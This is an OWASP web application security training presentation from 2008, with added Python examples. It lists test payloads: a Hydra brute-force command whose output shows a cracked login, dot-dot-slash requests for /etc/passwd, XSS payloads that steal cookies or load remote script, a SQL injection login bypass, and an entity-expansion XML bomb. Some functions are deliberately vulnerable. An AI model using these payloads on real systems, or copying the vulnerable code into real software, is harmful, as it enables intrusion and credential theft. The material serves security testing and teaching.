Romulus OWASP

Romulus project OWASP presentation. More info at: http://www.ict-romulus.eu/

Published in: Technology
  1. OWASP OVERVIEW. Alberto Pastor Nieto, Informática Gesfor, March 2008
  2. OWASP. Agenda:
     • The Open Web Application Security Project
     • OWASP Top Ten
     • OWASP Testing Guide (tools demonstration)
  4. OWASP: an open community interested in improving application security, not affiliated with any technology company.
  6. OWASP TOP TEN (2007)
     1. Cross Site Scripting (XSS)
     2. Injection Flaws
     3. Malicious File Execution
     4. Insecure Direct Object Reference
     5. Cross Site Request Forgery (CSRF)
     6. Information Leakage and Improper Error Handling
     7. Broken Authentication and Session Management
     8. Insecure Cryptographic Storage
     9. Insecure Communications
     10. Failure to Restrict URL Access
  8. Information Gathering. Tests covered:
     • Testing Web Application Fingerprint
     • Application Discovery
     • Spidering and Googling
     • SSL/TLS Testing
     • Testing for File Extensions Handling
     • Application Configuration Management Testing
     • Old, Backup and Unreferenced Files
  9. Information Gathering: Testing Web Application Fingerprint. Different servers, and different versions of the same server, answer the same request with different responses; those differences identify the product and version.
  10. Information Gathering: Testing Web Application Fingerprint. A banner grab with netcat:
     $ nc 202.41.76.251 80
     HEAD / HTTP/1.0

     HTTP/1.1 200 OK
     Date: Mon, 16 Jun 2003 02:53:29 GMT
     Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
     Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT
     ETag: "1813-49b-361b4df6"
     Accept-Ranges: bytes
     Content-Length: 1179
     Connection: close
     Content-Type: text/html
  11. Information Gathering: Testing Web Application Fingerprint. Tools: NETCRAFT (http://www.netcraft.com), httprint (http://www.net-square.com/httprint/).
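As an added example (not part of the slides), the Python below parses the HEAD response quoted on slide 10 and extracts the two clues that fingerprinting tools such as httprint rely on: the Server banner, and the order in which headers are emitted, which still differs between products when the banner has been removed or altered. The first sample response is the one from the slide; the second, bannerless response is a constructed, hypothetical sample used only to show the header-order signature.

```python
"""Pull fingerprinting clues (banner, header order) out of a raw HTTP response."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: the HEAD response quoted on slide 10 (Apache 1.3.3).
APACHE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 16 Jun 2003 02:53:29 GMT\r\n"
    "Server: Apache/1.3.3 (Unix) (Red Hat/Linux)\r\n"
    "Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT\r\n"
    'ETag: "1813-49b-361b4df6"\r\n'
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 1179\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Constructed, hypothetical sample of a server that hides its banner but
# emits headers in a different order (not a response from the slides).
BANNERLESS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 1179\r\n"
    "Date: Mon, 16 Jun 2003 02:53:29 GMT\r\n"
    "\r\n"
)

# product[/version] [comment], e.g. "Apache/1.3.3 (Unix) (Red Hat/Linux)"
BANNER_RE = re.compile(r"^(?P<product>[^/\s]+)(?:/(?P<version>\S+))?\s*(?P<comment>.*)$")


def parse_response(raw: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Split a raw response into its status line and the headers in wire order."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def header_order(raw: str) -> List[str]:
    """Header names in the order the server sent them.

    Products (and versions) order headers differently; this is the signature
    tools such as httprint compare when the banner is missing or faked.
    """
    _status, headers = parse_response(raw)
    return [name for name, _value in headers]


def server_banner(raw: str) -> Optional[Dict[str, str]]:
    """Return product / version / comment from the Server header, or None."""
    _status, headers = parse_response(raw)
    for name, value in headers:
        if name.lower() == "server":
            match = BANNER_RE.match(value)
            if match:
                return {key: (val or "") for key, val in match.groupdict().items()}
    return None


if __name__ == "__main__":
    print(server_banner(APACHE_RESPONSE), header_order(APACHE_RESPONSE))
    print(server_banner(BANNERLESS_RESPONSE), header_order(BANNERLESS_RESPONSE))
```

The header order is only a clue, not proof: a reverse proxy or load balancer in front of the application rewrites and reorders headers, so confirm the guess with a second technique (error pages, file-extension handling) before relying on it.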
  12. Information Gathering: Testing Web Application Fingerprint
  13. Information Gathering: Application Discovery. Related issues: different base URL, non-standard ports, virtual hosts.
  14. Information Gathering: Application Discovery. Different base URL:
     • Directory exploration?
     • Google (site:www.example.com)
     • Candidate URL lists (e.g. from Nessus)
  15. Information Gathering: Application Discovery. Non-standard ports (-P0 skips host discovery; current nmap spells it -Pn):
     $ nmap -P0 -sT -sV -p1-65535 192.168.1.100
     Interesting ports on 192.168.1.100:
     (The 65527 ports scanned but not shown below are in state: closed)
     PORT     STATE SERVICE VERSION
     22/tcp   open  ssh     OpenSSH 3.5p1 (protocol 1.99)
     80/tcp   open  http    Apache httpd 2.0.40 ((Red Hat Linux))
     443/tcp  open  ssl     OpenSSL
     901/tcp  open  http    Samba SWAT administration server
  16. Information Gathering: Application Discovery. Virtual hosts:
     $ host -t ns www.owasp.org
     www.owasp.org is an alias for owasp.org.
     owasp.org name server ns1.secure.net.
     owasp.org name server ns2.secure.net.
     Netcraft DNS search: http://searchdns.netcraft.com/?host
  17. Information Gathering: Spidering and Googling.
     Spidering: wget -r http://www.example.com
     Googling: googlegath.pl (http://www.nothink.org/perl/googlegath/)
  18. Information Gathering: SSL/TLS Testing. Vulnerability scanners report expired certificates, weak ciphers, ...; other tools: OpenSSL, SSLDigger.
  19. Information Gathering: Testing for File Extensions Handling. Identify the underlying technologies. Tools: wget, curl, web mirroring tools, vulnerability scanners.
  20. Information Gathering: Application Configuration Management Testing.
     • Typical files and well-known directories
     • Be careful with HTML comments
     • Customise error pages
     • Load only the modules you need
     • Run with minimal privileges
     • Log access, both successful and failed
  21. Information Gathering: Old, Backup and Unreferenced Files. Site map and technology clues; content clues. Practices:
     • Look into robots.txt and sitemap files
     • Public information (Google cache: and site: operators)
     • Search for backup suffixes: ~, .old, .bak, ...
  22. Information Gathering: Old, Backup and Unreferenced Files. Hardening:
     • Do not use mod_autoindex or mod_info (hide unnecessary information)
     • Correct file permissions
     • Use CHROOT
     • Follow logging recommendations
  23. Nessus (http://www.nessus.org): port scanner and vulnerability scanner.
  24. Business Logic Testing. Automated tools find it hard to understand context; you need people who know the business logic, and strong data testing.
  25. Authentication: Obtain User Accounts. Dictionary attacks, bruteforce attacks, pattern searching attacks.
  26. Authentication: Obtain User Accounts. Tools: John the Ripper, Hydra, Brutus, rainbow tables.
  27. Authentication: Obtain User Accounts. Hydra against an HTTPS login form (the module argument is "path:POST body with ^USER^ and ^PASS^ placeholders:string that marks a failed login"):
     raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &
     Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
     Hydra (http://www.thc.org) starting at 2009-07-04 19:16:17
     [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task
     [DATA] attacking service http-post-form on port 443
     [STATUS] attack finished for wiki.intranet (waiting for childs to finish)
     [443] host: 10.0.0.1 login: owasp password: password
     [STATUS] attack finished for www.site.com (waiting for childs to finish)
     Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
  28. Authentication: Bypassing authentication schema.
     • Direct page request
     • Parameter modification
     • Session ID prediction
     • SQL injection
  29. Authentication: Bypassing authentication schema. Tools: WebScarab, WebGoat (training).
  30. Authentication: Directory traversal/file include. Known as "dot-dot-slash". Two evaluation steps: input vector enumeration, then testing techniques.
  31. Authentication: Directory traversal/file include. Input vector enumeration: HTTP GET and POST requests, file loading, HTML forms, ...
  32. Authentication: Directory traversal/file include. Testing techniques:
     http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
     Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
     http://example.com/index.php?file=http://www.owasp.org/malicioustxt
     CAREFUL WITH CHARSET: the same traversal in encoded forms
     %2e%2e%2f is ../
     %2e%2e/   is ../
     %2e%2e%5c is ..\
     ..%2f     is ../
     %2e%2e    is ..
     ..%5c     is ..\
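As an added example (not from the slides), the Python below decodes the encoded variants listed on slide 32, including double-encoded ones such as %252e, and contrasts the vulnerable getUserProfile.jsp?item=... pattern with a resolver that canonicalises the path and refuses anything that leaves the base directory. The base directory /srv/app/profiles is a hypothetical value chosen for the example.

```python
"""Decode dot-dot-slash variants and resolve a user-supplied path safely."""
import os
import posixpath
from typing import Optional
from urllib.parse import unquote

# The encoded spellings listed on slide 32 and what each decodes to.
ENCODED_TRAVERSALS = {
    "%2e%2e%2f": "../",
    "%2e%2e/": "../",
    "%2e%2e%5c": "..\\",
    "..%2f": "../",
    "%2e%2e": "..",
    "..%5c": "..\\",
}


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %252e (double encoding) is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_traversal(value: str) -> bool:
    """True if any path segment is '..' after decoding and normalising backslashes."""
    decoded = decode_fully(value).replace("\\", "/")
    return ".." in decoded.split("/")


def vulnerable_resolve(base_dir: str, item: str) -> str:
    """The getUserProfile.jsp?item=... pattern: trust the parameter and return what the OS will open."""
    return posixpath.normpath(os.path.join(base_dir, unquote(item)))


def safe_resolve(base_dir: str, item: str) -> Optional[str]:
    """Decode, canonicalise, and require the result to stay under base_dir."""
    base = os.path.realpath(base_dir)
    # strip leading slashes so an absolute path cannot replace the base in os.path.join
    cleaned = decode_fully(item).replace("\\", "/").lstrip("/")
    candidate = os.path.realpath(os.path.join(base, cleaned))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


if __name__ == "__main__":
    base = "/srv/app/profiles"   # hypothetical document root
    for item in ("alice.html", "../../../../etc/passwd", "%2e%2e%5c%2e%2e%5cetc/passwd"):
        print(item, "->", vulnerable_resolve(base, item), "|", safe_resolve(base, item))
```

The check is done on the canonical path (after realpath), not on the raw string, because a blocklist of "../" spellings is exactly what the encoded variants on the slide were invented to slip past.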
  33. Authentication: Directory traversal/file include. Tools: WebScarab, Paros, Burp Suite.
  34. Authentication: Vulnerable remember password and pwd reset. "Security questions": multiple questions, strong questions, limited number of attempts, CAPTCHA, send the reset to the registered email address.
  35. Authentication: Vulnerable remember password and pwd reset. Careful with "Remember password":
     <INPUT TYPE="password" AUTOCOMPLETE="off">
     If the password must be kept in a cookie, keep it only in hashed form (a hashed password in a cookie is still a replayable credential, so a random server-side token is preferable).
  36. Session Management: Logout and Browser Cache Management Testing. A web session ends when:
     • the user logs out
     • the user remains idle for a certain amount of time and the application automatically logs him/her out
  37. Session Management: Logout and Browser Cache Management Testing. KEY: INVALIDATE THE SERVER-SIDE SESSION (Java: HttpSession.invalidate()).
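As an added example covering slides 35 to 37 (not code from the presentation), the Python below shows a session store in which logout and the idle timeout both happen on the server, so a captured cookie is worthless afterwards, and a "remember me" mechanism that never puts the password or its hash in the cookie: the cookie carries a random token and the server stores only its SHA-256 digest. The clock is injected so the idle timeout can be exercised without waiting; the 15-minute timeout is a hypothetical policy value.

```python
"""Server-side session store with logout, idle timeout and a remember-me token."""
import hashlib
import secrets
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60  # seconds; hypothetical policy value for this example


class SessionStore:
    """Sessions live on the server; the cookie carries only an opaque id."""

    def __init__(self, clock: Callable[[], float]) -> None:
        self._clock = clock            # injectable so the timeout can be tested
        self._sessions: Dict[str, dict] = {}

    def create(self, user: str) -> str:
        session_id = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[session_id] = {"user": user, "last_seen": self._clock()}
        return session_id

    def user_for(self, session_id: str) -> Optional[str]:
        """Resolve a cookie value; the idle timeout is enforced on every request."""
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        now = self._clock()
        if now - entry["last_seen"] > IDLE_TIMEOUT:
            del self._sessions[session_id]     # expired: same effect as a logout
            return None
        entry["last_seen"] = now
        return entry["user"]

    def logout(self, session_id: str) -> None:
        """The key step from slide 37: invalidate on the server, not only in the browser."""
        self._sessions.pop(session_id, None)


class RememberMe:
    """'Remember password' without putting the password (or its hash) in a cookie.

    The cookie holds a random token; the server keeps only sha256(token), so a
    leaked table does not yield usable cookies, and a stolen cookie can be
    revoked without forcing a password change.
    """

    def __init__(self) -> None:
        self._tokens: Dict[str, str] = {}   # sha256(token) -> user

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user: str) -> str:
        token = secrets.token_urlsafe(32)
        self._tokens[self._digest(token)] = user
        return token

    def redeem(self, token: str) -> Optional[str]:
        return self._tokens.get(self._digest(token))

    def revoke(self, token: str) -> None:
        self._tokens.pop(self._digest(token), None)
```

When testing a logout, the check is the one the store makes easy: replay the old cookie after logout and after the idle period and confirm the server answers as if unauthenticated; clearing the cookie in the browser alone proves nothing.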
  38. Session Management: Logout and Browser Cache Management Testing. Other practices: make the end-session button clearly visible; also expire the cookies on the client side.
  39. Session Management: Logout and Browser Cache Management Testing. Tools: WebScarab, Add N Edit Cookies (Firefox extension), Web Developer (Firefox extension).
  40. Session Management: Analysis of the Session Management Schema. Session token analysis: randomness, uniqueness, resistance to statistical analysis, resistance to cryptographic analysis.
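As an added example (not from the slides), the Python below runs the first two checks from slide 40, uniqueness and randomness, over a sample of collected tokens, in the spirit of what WebScarab's session-ID analysis and Cookie Digger automate: per-position Shannon entropy, a uniqueness ratio, and a test for tokens that are a counter in disguise. Both token sets are constructed here: a sequential scheme and tokens from the OS CSPRNG.

```python
"""Rough statistical checks on a sample of session tokens."""
import math
import secrets
from collections import Counter
from typing import List

# Constructed samples: a counter rendered as hex versus CSPRNG tokens of the same width.
PREDICTABLE_TOKENS = [f"{1000 + i:016x}" for i in range(200)]
RANDOM_TOKENS = [secrets.token_hex(8) for _ in range(200)]


def uniqueness(tokens: List[str]) -> float:
    """Fraction of distinct values; anything below 1.0 means collisions in the sample."""
    return len(set(tokens)) / len(tokens)


def position_entropy(tokens: List[str]) -> List[float]:
    """Shannon entropy in bits of the symbol at each position across the sample."""
    width = min(len(t) for t in tokens)
    result = []
    for pos in range(width):
        counts = Counter(t[pos] for t in tokens)
        total = sum(counts.values())
        result.append(-sum(c / total * math.log2(c / total) for c in counts.values()))
    return result


def mean_position_entropy(tokens: List[str]) -> float:
    """Average bits per position; hex tokens can reach at most 4.0."""
    ent = position_entropy(tokens)
    return sum(ent) / len(ent)


def is_sequential(tokens: List[str], base: int = 16, tolerance: float = 0.9) -> bool:
    """True if most consecutive tokens differ by one constant step when read as numbers."""
    try:
        values = [int(t, base) for t in tokens]
    except ValueError:
        return False
    diffs = [b - a for a, b in zip(values, values[1:])]
    if not diffs:
        return False
    step, count = Counter(diffs).most_common(1)[0]
    return step != 0 and count / len(diffs) >= tolerance


def assess(tokens: List[str]) -> dict:
    """Summary a tester would put in the report for a collected sample."""
    return {
        "uniqueness": uniqueness(tokens),
        "mean_bits_per_position": round(mean_position_entropy(tokens), 2),
        "sequential": is_sequential(tokens),
    }


if __name__ == "__main__":
    print("predictable:", assess(PREDICTABLE_TOKENS))
    print("random:     ", assess(RANDOM_TOKENS))
```

Per-position entropy is a coarse filter: it catches fixed prefixes, timestamps and counters, but a token generated by a weak PRNG can pass it while still being predictable, which is why the slide lists resistance to cryptographic analysis as a separate property.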
  41. Session Management: Cookie and Session Token Manipulation. Steps: cookie collection, cookie reverse engineering, cookie manipulation.
  42. Session Management: Cookie and Session Token Manipulation. Tools: WebScarab, Cookie Digger.
  43. Session Management: Cross Site Request Forgery (CSRF). CSRF describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices:
     • Add session-related information (an unpredictable, session-bound token) to the URLs/forms of state-changing requests
     • Use POST for state-changing actions (necessary, but not sufficient on its own)
     • Intermediate confirmation pages ("Are you sure you really want to do this?")
     • Check REFERER headers (weak on its own: the header can be absent)
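As an added example (not code from the presentation), the Python below implements the first recommendation on slide 43, a session-bound token on state-changing requests, as an HMAC of the session id under a server secret. Because the token is derived, nothing per-form has to be stored, and a token the attacker obtains from his own session fails for the victim's. The server secret is generated at import time here purely for the example; a real deployment loads it from configuration.

```python
"""Session-bound anti-CSRF token (synchronizer token pattern)."""
import hashlib
import hmac
import secrets
from typing import Optional

# Hypothetical server-side key: loaded from configuration in a real deployment.
SERVER_SECRET = secrets.token_bytes(32)
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def csrf_token(session_id: str) -> str:
    """HMAC of the session id: unguessable to another origin and useless in another session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def render_transfer_form(session_id: str) -> str:
    """The form as the server emits it to the logged-in user; the token travels with it."""
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf" value="{csrf_token(session_id)}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def verify_request(method: str, session_id: str, submitted_token: Optional[str]) -> bool:
    """Safe methods need nothing; state-changing ones must carry the session's token.

    A cross-site form or image tag makes the browser attach the victim's
    cookie, but the attacker cannot read the token out of the victim's page,
    so the forged POST arrives without it (or with the attacker's own, which fails).
    """
    if method.upper() in SAFE_METHODS:
        return True
    if not submitted_token:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted_token)


if __name__ == "__main__":
    victim = "session-of-victim"    # hypothetical session ids
    attacker = "session-of-attacker"
    print(render_transfer_form(victim))
    print("forged, no token:", verify_request("POST", victim, None))
    print("forged, attacker's token:", verify_request("POST", victim, csrf_token(attacker)))
    print("genuine:", verify_request("POST", victim, csrf_token(victim)))
```

The comparison uses hmac.compare_digest so a byte-by-byte early exit cannot leak the expected token through timing. Binding the token to the session id means the token must be rotated whenever the session id is (at login, for instance), which the derivation handles automatically.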
  44. Data Validation: XSS (Cross Site Scripting). XSS: code injection attacks into the various interpreters in the browser. Examples:
     http://server/cgi-bin/testcgi.exe?<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>
     <script src=http://www.example.com/malicious-code.js></script>
     %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
     \x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e   (JavaScript string escapes, for values reflected inside a script)
     Test all input vectors.
  45. Data Validation: XSS (Cross Site Scripting). Tools: OWASP CAL9000.
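As an added example (not from the slides), the Python below reflects the three payload spellings from slide 44 into the two places they target: element content, where the %3c form matters because the server URL-decodes before echoing, and a JavaScript string literal, where the \x3c form survives HTML-level filtering and is turned into "<" by the JavaScript engine. Each context gets a vulnerable renderer, a renderer with the encoding appropriate to that context, and the check a tester would apply to the response. The page fragments are constructed for the example.

```python
"""Reflecting a parameter into HTML and JavaScript-string contexts, unsafely and safely."""
import codecs
import html
import json
from urllib.parse import unquote

# Constructed inputs: the three payload spellings from slide 44.
PAYLOAD_PLAIN = "<script src=http://www.example.com/malicious-code.js></script>"
PAYLOAD_URLENC = "%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e"
PAYLOAD_JSESC = r"\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e"

JS_PREFIX, JS_SUFFIX = "<script>var q = ", ";</script>"


def vulnerable_html(param: str) -> str:
    """Echo the (URL-decoded) parameter straight into element content."""
    return f"<p>You searched for: {unquote(param)}</p>"


def safe_html(param: str) -> str:
    """HTML-entity-encode for an element-content context."""
    return f"<p>You searched for: {html.escape(unquote(param), quote=True)}</p>"


def vulnerable_js(param: str) -> str:
    """Echo into a JavaScript string literal without encoding."""
    return f'{JS_PREFIX}"{unquote(param)}"{JS_SUFFIX}'


def safe_js(param: str) -> str:
    """JSON-encode for a JS string literal, and encode '<' as well so the
    literal can never contain '</script>' as the HTML parser sees it."""
    literal = json.dumps(unquote(param)).replace("<", "\\u003c")
    return f"{JS_PREFIX}{literal}{JS_SUFFIX}"


def html_reflects_tag(page: str) -> bool:
    """Tester's check for the HTML context: did a raw <script tag come back?"""
    return "<script" in page.lower()


def script_element_broken(page: str) -> bool:
    """Tester's check for the JS context: more than the server's own </script>
    means the payload closed the script element early."""
    return page.lower().count("</script") > 1


def js_string_value(page: str) -> str:
    """What the JavaScript engine will hold in q once it decodes the literal
    (\\x3c and \\u003c both become '<'); for pages from the two *_js renderers."""
    literal = page[len(JS_PREFIX):-len(JS_SUFFIX)]
    return codecs.decode(literal[1:-1], "unicode_escape")


if __name__ == "__main__":
    for payload in (PAYLOAD_PLAIN, PAYLOAD_URLENC, PAYLOAD_JSESC):
        print(html_reflects_tag(vulnerable_html(payload)), html_reflects_tag(safe_html(payload)))
        print(repr(js_string_value(vulnerable_js(payload))), repr(js_string_value(safe_js(payload))))
```

The point the \x3c payload makes is that encoding is per context: html.escape does nothing for a value inside a script, and JSON encoding protects the script element but not a later DOM sink (innerHTML) that consumes the decoded string, which needs HTML encoding of its own at that sink.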
  46. Data Validation: SQL Injection. Insertion or "injection" of an SQL query via the input data from the client to the application. Example:
     SELECT * FROM Users WHERE Username='$username' AND Password='$password'
     Input:
     $username = 1' or '1' = '1
     $password = 1' or '1' = '1
     Resulting query:
     SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
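As an added example (not code from the presentation), the Python below runs the slide's login query against an in-memory SQLite table, once built by string interpolation exactly as on the slide and once with bound parameters. With the slide's input in both fields the interpolated query reads, by operator precedence, Username='1' OR ('1'='1' AND Password='1') OR '1'='1', and the trailing OR makes it true for every row; a comment sequence (alice'--) shows the same flaw used to log in as a chosen user. The Users table, its two rows and the plaintext passwords are constructed only so the query matches the slide.

```python
"""The slide's login query, built by string concatenation versus parameterised."""
import sqlite3
from typing import List, Tuple

INJECTION = "1' or '1' = '1"   # the input shown on slide 46


def build_db() -> sqlite3.Connection:
    """Constructed sample table; plaintext passwords only to mirror the slide's query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """Exactly the slide's query: user input spliced into the SQL text."""
    query = (
        f"SELECT * FROM Users WHERE Username='{username}' "
        f"AND Password='{password}'"
    )
    return conn.execute(query).fetchall()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[str, str]]:
    """Same query with bound parameters: the input is data, never SQL."""
    query = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(query, (username, password)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, slide input:", vulnerable_login(db, INJECTION, INJECTION))
    print("vulnerable, alice'--:   ", vulnerable_login(db, "alice'--", "anything"))
    print("parameterised, slide input:", safe_login(db, INJECTION, INJECTION))
    print("parameterised, real creds: ", safe_login(db, "alice", "s3cret"))
```

Parameter binding is the fix because the database receives the query structure and the values separately; escaping quotes by hand is the fragile alternative the tools on the next slide are built to defeat.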
  47. Data Validation: SQL Injection. Tools: OWASP SQLIX, SQL DUMPER.
  48. Data Validation: Other Injections.
     • LDAP Injection (Lightweight Directory Access Protocol)
     • ORM Injection (Hibernate in Java, NHibernate in .NET, ActiveRecord in Ruby on Rails)
     • XML Injection
     • SSI Injection
     • XPath Injection
     • IMAP/SMTP Injection
     • OS command Injection
  49. Data Validation: Buffer overflow. Issues caused by buffer overflows: denial of service (DoS), code injection, code execution. Practices: keep software updated; follow secure coding practices (bounds checking).
  50. Denial of Service.
     • Blocking user accounts (account lockout can be turned against legitimate users; use CAPTCHAs instead)
     • Buffer overflows
     • User-specified object allocation
     • User input as a loop counter
     • User-provided data written to disk
     • Failure to release resources
     • Storing too much data in the session
  51. Web Services.
     • XML structural testing: overloading the XML parser
     • XML content-level testing: XML/SQL/XPath... injections; validate input size
     • Naughty SOAP attachments testing
     • Man-in-the-middle testing
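As an added example (not from the slides), the Python below shows the cheap checks a web service can run on an XML request body before handing it to the parser, addressing the two structural items on slide 51: a size limit, rejection of documents that declare a DTD or entities (the mechanism behind entity-expansion attacks on the parser), and a cap on element nesting depth. The sample documents, including the abbreviated entity-expansion payload, and the limits are constructed for this example.

```python
"""Cheap pre-parse checks on XML sent to a web service endpoint."""
import re
from typing import Tuple

MAX_XML_BYTES = 64 * 1024   # hypothetical limits chosen for this example
MAX_DEPTH = 32

DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)
# start or end tag: group 1 is '/' for end tags, group 3 is '/' for self-closing tags
TAG_RE = re.compile(rb"<(/?)([A-Za-z_][\w.:-]*)[^>]*?(/?)>")

# Constructed entity-expansion document (three levels; the real thing goes to ten).
BILLION_LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

# Constructed benign request and a deeply nested one.
BENIGN = b"<order><item sku='A1'/><qty>2</qty></order>"
DEEPLY_NESTED = b"<a>" * 40 + b"x" + b"</a>" * 40


def max_nesting_depth(raw: bytes) -> int:
    """Count element depth from start/end tags; self-closing tags add nothing."""
    depth = deepest = 0
    for closing, _name, self_closing in TAG_RE.findall(raw):
        if closing:
            depth -= 1
        elif not self_closing:
            depth += 1
            deepest = max(deepest, depth)
    return deepest


def check_xml_input(raw: bytes) -> Tuple[bool, str]:
    """Reject oversized, DTD-bearing or too deeply nested documents before parsing."""
    if len(raw) > MAX_XML_BYTES:
        return False, "input larger than limit"
    if DTD_RE.search(raw):
        return False, "DTD/ENTITY declarations not accepted"
    if max_nesting_depth(raw) > MAX_DEPTH:
        return False, "nesting deeper than limit"
    return True, "ok"


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("entities", BILLION_LAUGHS), ("deep", DEEPLY_NESTED)):
        print(name, check_xml_input(doc))
```

These checks are a gate in front of the parser, not a replacement for configuring it: the parser itself should still be set to refuse external entities and DTDs, since the regex gate is deliberately simple and a document that passes it is then parsed in full.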
  52. AJAX Testing.
     • Increased attack surface with many more inputs to secure
     • Exposed internal functions of the application
     • Client access to third-party resources with no built-in security and encoding mechanisms
     • Failure to protect authentication information and sessions
     • Blurred line between client-side and server-side code, resulting in security mistakes
  53. Useful Tools: OWASP Enterprise Security API; OWASP Encoding Project (output encoding); OWASP Stinger (HTTP request validation); OWASP CSRFTester Project.
  54. Any Question? OWASP: http://www.owasp.org. Romulus Project: http://www.ict-romulus.org